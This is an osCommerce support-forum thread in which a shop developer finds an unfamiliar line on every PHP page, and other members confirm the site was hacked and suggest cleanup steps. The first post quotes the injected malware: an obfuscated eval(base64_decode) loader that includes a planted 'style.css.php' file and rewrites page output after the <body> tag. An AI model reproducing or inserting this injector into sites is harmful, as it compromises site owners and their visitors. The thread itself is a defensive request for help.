Jump to content

Archived

This topic is now archived and is closed to further replies.

lildog

Questionable Code

Recommended Posts

I had stepped away from OSC for awhile for personal reasons and have just returned and am working on an old clients shop. I have found a line of code on top of every php page and I do not recognize it. It is on all the catalog directory pages as well as includes pages, even all the language defines have it. here is the code I will omit a few chars so I am not giving away anything important. I do know the code has been encoded so I can't read it, I usually go WAY overboard on the comments and think I would remember inserting this in every page. Could it be required/inserted by her server? Maybe her ssl? I guess it could do just about anything. If anyone could help decode it so I can see what it is doing maybe I can figure out what it is doing.

 

Thank you,

lildog

 

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p

KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9kdWRzNGJ1ZC9wdWJsaWNfa

HRtbC9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy

5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9kdWRzNGJ1ZC9wdWJsaWNfaHRtbC9hZG1pbi9pbmNsdWR

lcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlv

bl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc

3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRj

A2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZ

ENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG

ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5O

ENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3Mz

M5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCw

yKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZD

ODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0M

jM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OT

dCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU

5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0

NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q

0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRj

A2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZ

CNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4

ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1Y

nN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QU

I0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0U

peyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4

MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jd

GlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbn

QtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2R

lKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkv

c2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlK

CcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0Rk

I5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU

5MDt9fW9iX3N0YXJ0KCdk')); ?>

Share this post


Link to post
Share on other sites

Unfortunately your site has been hacked.

 

You will need to take the steps indicated by Fimble as indicated in the links in the posts above.


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

Share this post


Link to post
Share on other sites

Ive just been hacked too. Same malicius code. This really sucks. Ive spent so many hours getting my site perfect.


Flying away to get back to work.

Share this post


Link to post
Share on other sites

Ive just been hacked too. Same malicius code. This really sucks. Ive spent so many hours getting my site perfect.


Flying away to get back to work.

Share this post


Link to post
Share on other sites

yes You are hacked.

 

rename admin.

delete filemanager code as well.

 

Satish


Ask/Skype for Free osCommerce value addon/SEO suggestion tips for your site.

 

Check My About US For who am I and what My company does.

Share this post


Link to post
Share on other sites

Thank you all for the replies. I will fix my code accordingly.

 

BTW, I only discovered this because the images from my clients thumbnail contrib were not showing, I removed the code and the thumbs are back.

 

lildog

Share this post


Link to post
Share on other sites

Yes I did. There were 66 files in the admin/includes/languages/english/modules/index directory. I think that was it. The big problem is someone worked on her store before me and it is really messy.

 

Todd

 

 

 

Todd,

Did you decode the script to find the files planted on your server?

Nic

Share this post


Link to post
Share on other sites

Yes I did. There were 66 files in the admin/includes/languages/english/modules/index directory. I think that was it. The big problem is someone worked on her store before me and it is really messy.

 

Todd

 

 

 

 

 

hmmm lovely!

 

Glad you got it sorted anyhow, well the hack code good luck with the rest

Nic


Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Share this post


Link to post
Share on other sites

×